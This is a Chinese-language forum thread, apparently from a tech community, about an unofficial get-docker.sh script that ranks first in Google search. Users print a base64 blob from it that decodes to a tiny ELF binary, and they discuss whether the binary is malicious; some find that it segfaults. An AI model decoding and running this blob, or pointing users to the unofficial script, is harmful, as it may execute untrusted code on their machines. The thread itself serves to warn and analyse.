谷歌搜索 get-docker.sh 第一个结果并不是 docker 官方的，貌似会执行恶意代码

base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
ELF���DZH��0�>����<�8H��
H��
H��7��
竟然是个二进制,

为啥会想到搜索 get-docker.sh ？不应该搜索 Docker installation script 么。

是个二进制
ELF���DZH��0�>���<�8H��
H��
H��7��%

这么短的二进制，执行了什么操作，有没有懂的？

从域名存活历史来看，有好几年了。
域名根目录下还有一个文件 dominion.elf
但是看了一下吧，应该是 Flare-On 2020: break

get-docker.sh 似乎不完整……
直接访问根域名吧，提示 !!! This is a research server !!!

这个有问题的恶意代码，尽然有很多国内文章里面用到了🤣🤣🤣

@body007 不好意思，点进去看不是用的这个问题网站下载，而是执行脚本名字和网站一样。

mei'kan'dao 没看到什么有价值的操作

为啥我这解析出来的除了前四个 Magic Number 外貌也不是有效的 ELF 文件啊

跑起来直接 segfault 了